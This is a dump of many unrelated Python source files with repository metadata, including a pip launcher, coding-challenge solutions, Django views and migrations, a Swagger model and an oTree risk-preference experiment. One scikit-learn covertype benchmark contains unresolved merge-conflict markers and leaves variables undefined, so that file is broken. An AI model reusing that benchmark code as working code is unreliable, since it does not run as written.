name_list = csv_file['name'].copy()
adr_list = csv_file['adr'].copy()
price_list = csv_file['price'].copy()
shop_list = csv_file['shop'].copy()
icons_list = csv_file['icons'].copy()
for i in range(0,len(name_list)):
name_list[i] = name_list[i].replace("\n", "")
with open(file_path, 'w', newline='', encoding='utf-8-sig')as f:
fieldnames = ["adr", "name", "price", "commit", "shop", "icons"]
f_csv = csv.DictWriter(f, fieldnames=fieldnames)
f_csv.writeheader()
for i in range(0, len(commit_list)):
f_csv.writerow(
{
"adr": adr_list[i],
"name": name_list[i],
"price": price_list[i],
"commit": commit_list[i],
"shop": shop_list[i],
"icons": icons_list[i]
}
)
f.close()
|
[
"44989275+Alex3der@users.noreply.github.com"
] |
44989275+Alex3der@users.noreply.github.com
|
3c2b72b64a2ab17b8dd5de8c68068bafa6824716
|
c8c021af70365b9079ef637bbd560d3dd3d10e8c
|
/.venv/bin/pip3
|
bfa2475ae3903112cbe673bbf474f340484f9751
|
[] |
no_license
|
pkunwu/whattoeat
|
064d79f3ead360974e9cb8e7e117d6eeaab07e30
|
1991d03bea1c883e863a3a0839ffc77d552bebba
|
refs/heads/master
| 2023-06-21T22:16:12.260242
| 2021-07-22T02:15:05
| 2021-07-22T02:15:05
| 355,035,234
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 270
|
#!/home/chenliang/Documents/Programming/WhatToEat/.venv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal.cli.main import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"pkunwu@gmail.com"
] |
pkunwu@gmail.com
|
|
d0f8333b966b57a0edb2b0537c142c13a7cbbac7
|
cd98f3e273da6b8117b9c3069eff5321939055fc
|
/Python/ErrorsAndExceptions/Exceptions/solution.py
|
8f7e165d2eb17cdc3453d5f3f803b13437013a4d
|
[] |
no_license
|
dev-11/HackerRankSolutions
|
86a3d6ad4f014b4022348c9bd3a573c729805f6a
|
f2c33dc359a55bae4d7f8921a46d4261f9dfa515
|
refs/heads/master
| 2021-06-24T17:30:59.834850
| 2019-07-25T19:23:52
| 2019-07-25T19:23:52
| 114,654,051
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 157
|
py
|
for i in range(int(input())):
try:
a,b = map(int,input().split())
print(a//b)
except Exception as e:
print("Error Code:",e)
|
[
"giotto007@gmail.com"
] |
giotto007@gmail.com
|
6bb7901debec9f9ddd547ba4fb9d52462ca74c58
|
fa45fe7eaba7ef7c27ecf95db7c460ca189ce0d4
|
/everydays/BookBeingRead/python高级编程/day12.1.py
|
0d2033516213b11dfa91ea44119d6e37e17ceb4c
|
[] |
no_license
|
jake20001/Hello
|
be1a2bb5331f2ad4c1d8f30c6a9a530aff79e605
|
08217871bb17152eb09e68cd154937ebe5d59d2c
|
refs/heads/master
| 2021-07-10T09:48:15.883716
| 2021-04-23T14:49:03
| 2021-04-23T14:49:03
| 56,282,358
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 774
|
py
|
# -*- coding:utf-8 -*-
# -------------------------------
# ProjectName : autoDemo
# Author : zhangjk
# CreateTime : 2020/12/18 11:05
# FileName : day12.1
# Description :
# --------------------------------
import os
class DublinCoreAdapter(object):
def __init__(self,filename):
self._filename = filename
def title(self):
return os.path.splitext(self._filename)[0]
def creater(self):
return "Someone"
def language(self):
return ('en',)
class DublinCoreInfo(object):
def summary(self,dc_ob):
print('Title %s'%dc_ob.title())
print('Create %s'%dc_ob.creater())
print('Languge %s'%','.join(dc_ob.language()))
adapter = DublinCoreAdapter('1.txt')
infos = DublinCoreInfo()
infos.summary(adapter)
|
[
"jianke.zhang@beantechs.com"
] |
jianke.zhang@beantechs.com
|
0d47dd61b2368620cb8f0061a923c73cc7be140f
|
5b0c9ebe1576fdf6fcc1abf8d5c781fdc0aab591
|
/test3.py
|
82be98b389109e219d53f572d236b1c6bea018b0
|
[] |
no_license
|
Alex-kaer/paxos-edu
|
de7dc072cc159e175d6facbe0cbffb553d6606d6
|
4036adc76ff476b6d86605ba177793f2c668defa
|
refs/heads/master
| 2020-03-31T12:02:50.210231
| 2018-08-23T21:11:32
| 2018-08-23T21:16:26
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 238
|
py
|
from paxos import run_cli
hosts_ports = (
('127.0.0.1', '8881'),
('127.0.0.1', '8882'),
('127.0.0.1', '8883'),
('127.0.0.1', '8884'),
('127.0.0.1', '8885'),
)
run_cli(*hosts_ports[2], hosts_ports, hosts_ports[2][1])
|
[
"jimzuolin@gmail.com"
] |
jimzuolin@gmail.com
|
4422f7d5921e314273bf3e365ade27b53d14f1d0
|
053c7e3649fa0e7b9fee1d575227f3df3dc9514e
|
/venv/lib/python3.7/rlcompleter.py
|
7d314a0e11ceea9c8379850d542c51282747dc59
|
[] |
no_license
|
brady19990517/bottletest
|
2908d489929f50224047893809fd56c5484f14f0
|
038cd7dfa1bed30a0a92369e735ce6427daec690
|
refs/heads/master
| 2022-06-13T17:05:59.187688
| 2019-07-29T08:13:26
| 2019-07-29T08:13:26
| 199,409,471
| 0
| 0
| null | 2022-06-03T22:45:16
| 2019-07-29T08:17:52
|
Python
|
UTF-8
|
Python
| false
| false
| 51
|
py
|
/Users/bpeng/anaconda3/lib/python3.7/rlcompleter.py
|
[
"dearbrady19990517@gmail.com"
] |
dearbrady19990517@gmail.com
|
0825d679a4a233d1b744c5a713dd44acfafe47e4
|
4e8b2390820525051aaca421e657b4bbb7c86eb2
|
/querysys/url.py
|
26479b9e915c2788199e20bb841a6ac135cfa39f
|
[] |
no_license
|
HandsomeCodeMan123/StudentManage
|
837a461ee08db16d59b7117d4a4ba7d75b5f2fb9
|
7560aaf97e3442d1e682d9b7e64b162856552321
|
refs/heads/master
| 2023-04-01T18:44:43.839067
| 2021-04-01T13:53:03
| 2021-04-01T13:53:03
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 157
|
py
|
from django.urls import path
from querysys.views import index,addstudent
urlpatterns = [
path('index/', index),
path('addstudent/', addstudent),
]
|
[
"291882490@qq.com"
] |
291882490@qq.com
|
12036ced2dc9a7de9f3d4d79fc1ad4e7fbcbe6cd
|
8fef8af953e8dafde78c671e8ee9813d08ab2d60
|
/trees/BST/LowestCommAncestor.py
|
f1e104c3496e69731c8a6af520b879abc8aa4736
|
[
"MIT"
] |
permissive
|
htrahddis-hub/DSA-Together-HacktoberFest
|
037b009c744863070e0f1b61167c18f9101335f2
|
a5c6165c449c5b5b91e56815f2a38d5fd23bf354
|
refs/heads/main
| 2023-08-23T18:52:55.654386
| 2021-10-17T15:45:14
| 2021-10-17T15:45:14
| 418,180,825
| 1
| 0
|
MIT
| 2021-10-17T15:56:21
| 2021-10-17T15:56:21
| null |
UTF-8
|
Python
| false
| false
| 2,808
|
py
|
# Link to the problem :https://practice.geeksforgeeks.org/problems/lowest-common-ancestor-in-a-bst/1#
#Function to find the lowest common ancestor in a BST.
# We are looking for a node which is closest to both the nodes
def LCA(root, n1, n2):
#code here.
while(root):
# If the root is greater than both nodes , then we are looking for something smaller , so go to left
if(root.data > n1 and root.data > n2):
root = root.left
# If the root is smaller than both nodes , then we are looking for something greater than this and go to right
elif(root.data < n1 and root.data < n2):
root = root.right
#If the root is not greater or smaller then we have found something closest to both the nodes , so returns the root
else:
break
return root
#{
# Driver Code Starts
#Initial Template for Python 3
from collections import deque
# Tree Node
class Node:
def __init__(self, val):
self.right = None
self.data = val
self.left = None
# Function to Build Tree
def buildTree(s):
#Corner Case
if(len(s)==0 or s[0]=="N"):
return None
# Creating list of strings from input
# string after spliting by space
ip=list(map(str,s.split()))
# Create the root of the tree
root=Node(int(ip[0]))
size=0
q=deque()
# Push the root to the queue
q.append(root)
size=size+1
# Starting from the second element
i=1
while(size>0 and i<len(ip)):
# Get and remove the front of the queue
currNode=q[0]
q.popleft()
size=size-1
# Get the current node's value from the string
currVal=ip[i]
# If the left child is not null
if(currVal!="N"):
# Create the left child for the current node
currNode.left=Node(int(currVal))
# Push it to the queue
q.append(currNode.left)
size=size+1
# For the right child
i=i+1
if(i>=len(ip)):
break
currVal=ip[i]
# If the right child is not null
if(currVal!="N"):
# Create the right child for the current node
currNode.right=Node(int(currVal))
# Push it to the queue
q.append(currNode.right)
size=size+1
i=i+1
return root
if __name__=="__main__":
t=int(input())
for _ in range(0,t):
s=input()
root=buildTree(s)
n1,n2=list(map(int,input().split()))
print(LCA(root,n1,n2).data);
# } Driver Code Ends
|
[
"dsrao0712@gmail.com"
] |
dsrao0712@gmail.com
|
7193b1ee65106633518983747b93915b9493a142
|
f706a4fe6663e1e51f2393f69927fec7c2275b10
|
/src/newsletter/views.py
|
7225378ed79727bd2e6643723fa84cdae8fbd671
|
[] |
no_license
|
Dipenjethva19/HappyFace_MVP_Newsletter_App
|
6106175b97db346246c937ae84f66d79df33c7d7
|
61d22ac9ce6caccb9d58d6ded93d134b0edfeb1a
|
refs/heads/master
| 2022-11-09T01:14:29.746277
| 2017-06-07T20:33:14
| 2017-06-07T20:33:14
| 93,466,717
| 0
| 1
| null | 2022-10-27T03:52:30
| 2017-06-06T02:24:37
|
Python
|
UTF-8
|
Python
| false
| false
| 2,598
|
py
|
from django.conf import settings
from django.shortcuts import render
from .forms import ContactForm, SignUpForm
from django.core.mail import send_mail
from .models import SignUp
# Create your views here.
def home(request):
title = 'Sign Up Now'
# if request.user.is_authenticated:
# title = 'Welcome To my App. %s' % request.user
# if request.method == 'POST':
# print(request.POST)
form = SignUpForm(request.POST or None)
context = {
'title': title,
'form': form
}
if form.is_valid():
instance = form.save(commit=False)
full_name = form.cleaned_data.get("full_name")
if not full_name:
full_name = "new any user"
instance.full_name = full_name
# if not instance.full_name:
# instance.full_name = 'Any User'
form.save()
context = {
"title": 'Thank You'
}
if request.user.is_authenticated() and request.user.is_staff:
for instance in SignUp.objects.all():
print(instance.email)
queryset = SignUp.objects.all()
context = {
'queryset': queryset
}
return render(request, "home.html", context)
def contact(request):
title = 'Contact Us'
form = ContactForm(request.POST or None)
if form.is_valid():
for key in form.cleaned_data:
# print(key)
# print(form.cleaned_data.get(key))
form_email = form.cleaned_data.get('email')
form_message = form.cleaned_data.get('message')
form_full_name = form.cleaned_data.get('full_name')
some_html_message = """
<h1>Hello</h1>
"""
# print(email,message,full_name)
subject = 'EmailTesting'
from_email = settings.EMAIL_HOST_USER
to_email = [from_email, ]
contact_message = "%s: %s via %s" % (
form_full_name,
form_message,
form_email
)
send_mail(
subject,
contact_message,
from_email,
to_email,
html_message=some_html_message,
fail_silently=False
)
send_mail(
'Subject here',
'Here is the message.',
'from@example.com',
['to@example.com'],
fail_silently=False,
)
context = {
'form': form,
'title': title
}
return render(request, 'forms.html', context)
|
[
"dipenjethva19@gmail.com"
] |
dipenjethva19@gmail.com
|
ce2059c2fc6ac68411c1e74a87f22ee1b3a945ba
|
330491e45677af7dc41525336296b3f322a146e6
|
/data_collection/svcca_test_scan.py
|
f34105ef9c989289953072f079e04d3f3a04d7ea
|
[] |
no_license
|
arnupretorius/betterInitAtLimitedDepth_2019
|
c8eff9ad6340a0b8f8f30897684cc31158189c9d
|
a3488aba6f0003892f72e61f659178a4758061b4
|
refs/heads/master
| 2020-07-03T03:53:23.904397
| 2019-08-11T14:44:36
| 2019-08-11T14:44:36
| 201,775,497
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,024
|
py
|
import sys, os
import numpy as np
sys.path.append(os.path.join(os.path.dirname(os.path.abspath(__file__)), '..'))
from src.utils import load_model, get_experiment_dicts
TEST_LIST_DIRECTORY = "{}/temp/".format(os.path.dirname(os.path.abspath(__file__)))
TEST_LIST_PATH = "{}/test_list.txt".format(TEST_LIST_DIRECTORY)
TEST_DICT_PATH = "{}/test_dict.npz".format(TEST_LIST_DIRECTORY)
def write_details_to_file(dictionary, dict_index, keys=[]):
for key in dictionary:
if isinstance(dictionary[key], dict):
write_details_to_file(dictionary[key], dict_index, keys + [key])
elif isinstance(dictionary[key], list):
final_epoch_model_path = os.path.abspath(dictionary[key][-1])
# write to file (append)
with open(TEST_LIST_PATH, "a") as test_list_file:
[noise_type, noise_level, hyperparam_index], init_index = keys, key
test_list_file.write(
"{dict_index} {noise_type} {noise_level} {hyperparam_index} {init_index}\n".format(
dict_index=dict_index, noise_type=noise_type, noise_level=noise_level,
hyperparam_index=hyperparam_index, init_index=init_index
)
)
else:
raise ValueError("The dictionary provided to the write_final_epoch_path_to_file function was not in the correct format.")
if __name__ == "__main__":
root_dir = '../results/mnist'
experiment_dicts = get_experiment_dicts(root_dir)
paths_per_experiment_dict = []
for experiment_dict in experiment_dicts:
model_paths = load_model(experiment_dict, path_to_results=root_dir)
paths_per_experiment_dict.append(model_paths)
os.makedirs(TEST_LIST_DIRECTORY, exist_ok=True)
open(TEST_LIST_PATH, "w").close()
np.savez_compressed(TEST_DICT_PATH, data=paths_per_experiment_dict)
for index, dictionary in enumerate(paths_per_experiment_dict):
write_details_to_file(dictionary, dict_index=index)
|
[
"arnupretorius@gmail.com"
] |
arnupretorius@gmail.com
|
1eba6ca236ff4f6105330a8c2c4442d3537a21a8
|
00b762e37ecef30ed04698033f719f04be9c5545
|
/scripts/test_results/scikit-learn_test_results/conflicts/52_bench_sgd_covertype_actual.py
|
f88cf076b4bf0da384e6c9ba249ccf1ec8f143b1
|
[] |
no_license
|
kenji-nicholson/smerge
|
4f9af17e2e516333b041727b77b8330e3255b7c2
|
3da9ebfdee02f9b4c882af1f26fe2e15d037271b
|
refs/heads/master
| 2020-07-22T02:32:03.579003
| 2018-06-08T00:40:53
| 2018-06-08T00:40:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,491
|
py
|
"""
================================
Covertype dataset with dense SGD
================================
Benchmark stochastic gradient descent (SGD), Liblinear, and Naive Bayes, CART
(decision tree), RandomForest and Extra-Trees on the forest covertype dataset of
Blackard, Jock, and Dean [1]. The dataset comprises 581,012 samples. It is low-
dimensional with 54 features and a sparsity of approx. 23%. Here, we consider
the task of predicting class 1 (spruce/fir). The classification performance of
SGD is competitive with Liblinear while being two orders of magnitude faster to
train::
[..]
Classification performance:
===========================
Classifier train-time test-time error-rate
--------------------------------------------
Liblinear 11.8977s 0.0285s 0.2305
GaussianNB 3.5931s 0.6645s 0.6367
SGD 0.2924s 0.0114s 0.2300
CART 39.9829s 0.0345s 0.0476
RandomForest 794.6232s 1.0526s 0.0249
Extra-Trees 1401.7051s 1.1181s 0.0230
The same task has been used in a number of papers including:
* `"SVM Optimization: Inverse Dependence on Training Set Size"
<http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.139.2112>`_
S. Shalev-Shwartz, N. Srebro - In Proceedings of ICML '08.
* `"Pegasos: Primal estimated sub-gradient solver for svm"
<http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.74.8513>`_
S. Shalev-Shwartz, Y. Singer, N. Srebro - In Proceedings of ICML '07.
* `"Training Linear SVMs in Linear Time"
<www.cs.cornell.edu/People/tj/publications/joachims_06a.pdf>`_
T. Joachims - In SIGKDD '06
[1] http://archive.ics.uci.edu/ml/datasets/Covertype
To run this example use your favorite python shell::
% ipython benchmark/bench_sgd_covertype.py
"""
from __future__ import division
print __doc__
# Author: Peter Prettenhoer <peter.prettenhofer@gmail.com>
# License: BSD Style.
# $Id$
from time import time
import os
import numpy as np
from sklearn.svm import LinearSVC
from sklearn.linear_model import SGDClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier, ExtraTreesClassifier
from sklearn.ensemble.gradient_boosting import GradientBoostingClassifier
from sklearn import metrics
######################################################################
## Download the data, if not already on disk
if not os.path.exists('covtype.data.gz'):
# Download the data
import urllib
print "Downloading data, Please Wait (11MB)..."
opener = urllib.urlopen(
'http://archive.ics.uci.edu/ml/'
'machine-learning-databases/covtype/covtype.data.gz')
open('covtype.data.gz', 'wb').write(opener.read())
######################################################################
## Load dataset
print("Loading dataset...")
import gzip
f = gzip.open('covtype.data.gz')
X = np.fromstring(f.read().replace(",", " "), dtype=np.float64, sep=" ",
count=-1)
X = X.reshape((581012, 55))
f.close()
# class 1 vs. all others.
y = np.ones(X.shape[0]) * -1
y[np.where(X[:, -1] == 1)] = 1
X = X[:, :-1]
######################################################################
## Create train-test split (as [Joachims, 2006])
print("Creating train-test split...")
idx = np.arange(X.shape[0])
np.random.seed(13)
np.random.shuffle(idx)
train_idx = idx[:522911]
test_idx = idx[522911:]
X_train = X[train_idx]
y_train = y[train_idx]
X_test = X[test_idx]
y_test = y[test_idx]
# free memory
del X
del y
######################################################################
## Standardize first 10 features (the numerical ones)
mean = X_train.mean(axis=0)
std = X_train.std(axis=0)
mean[10:] = 0.0
std[10:] = 1.0
X_train = (X_train - mean) / std
X_test = (X_test - mean) / std
######################################################################
## Print dataset statistics
print("")
print("Dataset statistics:")
print("===================")
print("%s %d" % ("number of features:".ljust(25),
X_train.shape[1]))
print("%s %d" % ("number of classes:".ljust(25),
np.unique(y_train).shape[0]))
print("%s %d (%d, %d)" % ("number of train samples:".ljust(25),
X_train.shape[0], np.sum(y_train == 1),
np.sum(y_train == -1)))
print("%s %d (%d, %d)" % ("number of test samples:".ljust(25),
X_test.shape[0], np.sum(y_test == 1),
np.sum(y_test == -1)))
print("")
print("Training classifiers...")
print("")
######################################################################
## Benchmark classifiers
def benchmark(clf):
t0 = time()
clf.fit(X_train, y_train)
train_time = time() - t0
t0 = time()
pred = clf.predict(X_test)
test_time = time() - t0
err = metrics.zero_one(y_test, pred) / float(pred.shape[0])
return err, train_time, test_time
######################################################################
## Train Liblinear model
liblinear_parameters = {
'loss': 'l2',
'penalty': 'l2',
'C': 1000,
'dual': False,
'tol': 1e-3,
}
liblinear_res = benchmark(LinearSVC(**liblinear_parameters))
liblinear_err, liblinear_train_time, liblinear_test_time = liblinear_res
######################################################################
## Train GaussianNB model
gnb_err, gnb_train_time, gnb_test_time = benchmark(GaussianNB())
######################################################################
## Train SGD model
sgd_parameters = {
'alpha': 0.001,
'n_iter': 2,
}
sgd_err, sgd_train_time, sgd_test_time = benchmark(SGDClassifier(
**sgd_parameters))
## Train CART model
<<<<<<< REMOTE
cart_err, cart_train_time, cart_test_time = benchmark(
DecisionTreeClassifier(min_split=5,
max_depth=None))
=======
## print("Training GB model")
>>>>>>> LOCAL
<<<<<<< REMOTE
=======
## gb_err, gb_train_time, gb_test_time = benchmark(
>>>>>>> LOCAL
<<<<<<< REMOTE
######################################################################
=======
## GradientBoostingClassifier(min_split=5, max_depth=10, n_iter=20,
>>>>>>> LOCAL
<<<<<<< REMOTE
## Train RandomForest model
=======
## learn_rate=.8, subsample=0.5))
>>>>>>> LOCAL
<<<<<<< REMOTE
print("")
=======
>>>>>>> LOCAL
## print_row("GB", gb_train_time, gb_test_time, gb_err)
######################################################################
## Print classification performance
print_row("RandomForest", rf_train_time, rf_test_time, rf_err)
print_row("Extra-Trees", et_train_time, et_test_time, et_err)
print("Classification performance:")
print("===========================")
print("")
def print_row(clf_type, train_time, test_time, err):
print("%s %s %s %s" % (clf_type.ljust(12),
("%.4fs" % train_time).center(10),
("%.4fs" % test_time).center(10),
("%.4f" % err).center(10)))
print("%s %s %s %s" % ("Classifier ", "train-time", "test-time",
"error-rate"))
print("-" * 44)
print_row("Liblinear", liblinear_train_time, liblinear_test_time,
liblinear_err)
print_row("GaussianNB", gnb_train_time, gnb_test_time, gnb_err)
print_row("SGD", sgd_train_time, sgd_test_time, sgd_err)
print_row("CART", cart_train_time, cart_test_time, cart_err)
print("")
print("")
|
[
"srhee4@cs.washington.edu"
] |
srhee4@cs.washington.edu
|
425bddbdd429969023d4fdd888c1097c5b7142ee
|
1b30b1d8f8f0903052ae65af48daed3866ee7fde
|
/swagger_client/models/tpo_data_dt_os_controller_parameters_lab_request_parameter.py
|
7e8d05bce4bbbf2abe8ce6ef8425e0b464eceba5
|
[] |
no_license
|
my-workforce/TMB-SDK
|
206ff87242c13abdfd8fecbeda25b0499550f42b
|
bea9e8dd82240c30f7809b052a4a612202d4e607
|
refs/heads/main
| 2023-03-31T18:11:01.735690
| 2021-03-31T13:00:49
| 2021-03-31T13:00:49
| 353,358,046
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,648
|
py
|
# coding: utf-8
"""
Transaction Management Bus (TMB) API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: V3.2.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class TpoDataDTOsControllerParametersLabRequestParameter(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'lab_request': 'TpoDataDTOsLabLabRequestDTO'
}
attribute_map = {
'lab_request': 'LabRequest'
}
def __init__(self, lab_request=None): # noqa: E501
"""TpoDataDTOsControllerParametersLabRequestParameter - a model defined in Swagger""" # noqa: E501
self._lab_request = None
self.discriminator = None
self.lab_request = lab_request
@property
def lab_request(self):
"""Gets the lab_request of this TpoDataDTOsControllerParametersLabRequestParameter. # noqa: E501
:return: The lab_request of this TpoDataDTOsControllerParametersLabRequestParameter. # noqa: E501
:rtype: TpoDataDTOsLabLabRequestDTO
"""
return self._lab_request
@lab_request.setter
def lab_request(self, lab_request):
"""Sets the lab_request of this TpoDataDTOsControllerParametersLabRequestParameter.
:param lab_request: The lab_request of this TpoDataDTOsControllerParametersLabRequestParameter. # noqa: E501
:type: TpoDataDTOsLabLabRequestDTO
"""
if lab_request is None:
raise ValueError("Invalid value for `lab_request`, must not be `None`") # noqa: E501
self._lab_request = lab_request
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(TpoDataDTOsControllerParametersLabRequestParameter, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, TpoDataDTOsControllerParametersLabRequestParameter):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"fodeh@i3hub.com"
] |
fodeh@i3hub.com
|
516ddce9995ee16a9c3d14b282864b36283da25f
|
0805420ce1890c36aa9e0cc1a782945464433ef6
|
/client/eve/common/lib/eveLocalization/__init__.py
|
a26d9acf4f873ae1332caf2913e0b18ee75e8119
|
[] |
no_license
|
cnrat/dec-eve-serenity
|
4ebc3b2ab8faa6e6714dbb72b7ebcf92c4b2d75c
|
37519e66a5fbb0d7c417d5cf9778636991efbed8
|
refs/heads/master
| 2021-01-21T03:39:48.969227
| 2016-08-10T05:25:07
| 2016-08-10T05:25:07
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 211
|
py
|
# Python bytecode 2.7 (decompiled from Python 2.7)
# Embedded file name: e:\jenkins\workspace\client_SERENITY\branches\release\SERENITY\eve\common\lib\eveLocalization\__init__.py
from _evelocalization import *
|
[
"victorique.de.blois@asu.edu"
] |
victorique.de.blois@asu.edu
|
85349b427bd1ddd389ed5a26358d73ea6ac2bbe1
|
535f2c4632a0c228b4de75f796c9ecead38a1981
|
/post/migrations/0006_rename_action_post_active.py
|
8257b6648e8c419ea54d9ab401d8069c2e16b207
|
[] |
no_license
|
XavierLarrea/django-multi-language-blog
|
d0b54a16a34604c8d4fe65c7472d32dc05a6df1d
|
af9f53a439d979aeddeb316a55f132c8efb32631
|
refs/heads/main
| 2023-07-15T20:04:44.388310
| 2021-08-24T23:33:33
| 2021-08-24T23:33:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 355
|
py
|
# Generated by Django 3.2.4 on 2021-06-23 09:05
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('post', '0005_alter_post_slug'),
]
operations = [
migrations.RenameField(
model_name='post',
old_name='action',
new_name='active',
),
]
|
[
"mohamedemad1891@gmail.com"
] |
mohamedemad1891@gmail.com
|
3122c5bca375e6b689e28626fa6ed0dc01866f47
|
cc0433023de4c8300770e5a645e204781c299a90
|
/models.py
|
53abe067a7c5887ebfb4cd0ab84d8fbc6555edb8
|
[] |
no_license
|
ahmedsalimnuhu/Risk-preferences-python-codes
|
5e47783db09de415ffa64c546d33a864567ad169
|
eee933ffffc30d8770bd8e47874fbb35be395d54
|
refs/heads/master
| 2022-11-27T22:05:13.524564
| 2020-08-07T17:20:30
| 2020-08-07T17:20:30
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,792
|
py
|
from otree.api import (
models, widgets, BaseConstants, BaseSubsession, BaseGroup, BasePlayer
#Currency as c, currency_range
)
from risk.config import *
import random
from random import randrange
author = 'Salim Nuhu'
doc = """
Certainty equivalent method as proposed by Cohen et al. (1987) and Abdellaoui et al. (2011),
as well as variations thereof suggested by Bruner (2009) and Gächter et al. (2010).
"""
# ******************************************************************************************************************** #
# *** CLASS SUBSESSION
# ******************************************************************************************************************** #
class Subsession(BaseSubsession):
# initiate lists before session starts in round 1
# ----------------------------------------------------------------------------------------------------------------
def creating_session(self):
if self.round_number == Constants.num_rounds:
#self.session.config['REAL_WORLD_CURRENCY_CODE'] = Constants.KSH
vchoice = random.choice(Constants.coin)
self.session.vars['vchoice'] = vchoice
if self.round_number == 1:
n = Constants.num_choices
for p in self.get_players():
# create list of lottery indices
# ----------------------------------------------------------------------------------------------------
indices = [j for j in range(1, n + 1)]
# create list corresponding to form_field variables including all choices
# ----------------------------------------------------------------------------------------------------
form_fields = ['choice_' + str(k) for k in indices]
# create list of probabilities
# ----------------------------------------------------------------------------------------------------
if Constants.variation == 'probability':
probabilities = [Constants.probability + (k - 1) * Constants.step_size for k in indices]
else:
probabilities = [Constants.probability for k in indices]
# create list of high lottery payoffs
# ----------------------------------------------------------------------------------------------------
if Constants.variation == 'lottery_hi':
lottery_hi = [(Constants.lottery_hi + (k - 1) * Constants.step_size) for k in indices]
else:
lottery_hi = [(Constants.lottery_hi) for k in indices]
# create list of low lottery payoffs
# ----------------------------------------------------------------------------------------------------
if Constants.variation == 'lottery_lo':
lottery_lo = [(Constants.lottery_lo - (k - 1) * Constants.step_size) for k in indices]
else:
lottery_lo = [(Constants.lottery_lo) for k in indices]
# create list of sure payoffs
# ----------------------------------------------------------------------------------------------------
if Constants.variation == 'sure_payoff':
sure_payoffs = [(Constants.sure_payoff + (k - 1) * Constants.step_size) for k in indices]
else:
sure_payoffs = [(Constants.sure_payoff) for k in indices]
# create list of choices
# ----------------------------------------------------------------------------------------------------
p.participant.vars['cem_choices'] = list(
zip(
indices,
form_fields,
probabilities,
lottery_hi,
lottery_lo,
sure_payoffs
)
)
# randomly determine index/choice of binary decision to pay
# ----------------------------------------------------------------------------------------------------
p.participant.vars['cem_index_to_pay'] = random.choice(indices)
p.participant.vars['cem_choice_to_pay'] = 'choice_' + str(p.participant.vars['cem_index_to_pay'])
# randomize order of lotteries if <random_order = True>
# ----------------------------------------------------------------------------------------------------
if Constants.random_order:
random.shuffle(p.participant.vars['cem_choices'])
# initiate list for choices made
# ----------------------------------------------------------------------------------------------------
p.participant.vars['cem_choices_made'] = [None for j in range(1, n + 1)]
# generate random switching point for PlayerBot in tests.py
# --------------------------------------------------------------------------------------------------------
for participant in self.session.get_participants():
participant.vars['cem-bot_switching_point'] = random.randint(1, n)
# ******************************************************************************************************************** #
# *** CLASS GROUP
# ******************************************************************************************************************** #
class Group(BaseGroup):
pass
# ******************************************************************************************************************** #
# *** CLASS PLAYER
# ******************************************************************************************************************** #
class Player(BasePlayer):
# add model fields to class player
# ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
for j in range(1, Constants.num_choices + 1):
locals()['choice_' + str(j)] = models.StringField()
del j
random_draw = models.IntegerField()
choice_to_pay = models.StringField()
option_to_pay = models.StringField()
inconsistent = models.IntegerField()
switching_row = models.IntegerField()
name = models.StringField(
label='''
Name''',
)
company = models.StringField(
label='''
Name of the firm you represent''',
)
position = models.StringField(
label='''
Your role in the company''',
)
age = models.IntegerField(
label='Age',
min=18, max=125)
gender = models.StringField(
choices=['Male', 'Female'],
label='Gender',
widget=widgets.RadioSelect
)
educ = models.StringField(
choices=['Not Gone to School', 'Primary', 'Secondary',
'Diploma(Including Nursing, Vocational and Teaching Diploma)',
'University Degree', 'Postgraduate Degree', 'Doctorate'],
label=''' What is the highest level of education you have completed? ''',
widget=widgets.RadioSelect
)
county = models.StringField(
label='''
In which county is your company/organization located
'''
)
product = models.StringField(
label='''
What is your organization's main product (focus area if NGO)?
'''
)
# set player's payoff
# ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
def set_payoffs(self):
# random draw to determine whether to pay the "high" or "low" outcome of the randomly picked lottery
# ------------------------------------------------------------------------------------------------------------
self.random_draw = randrange(1, 100)
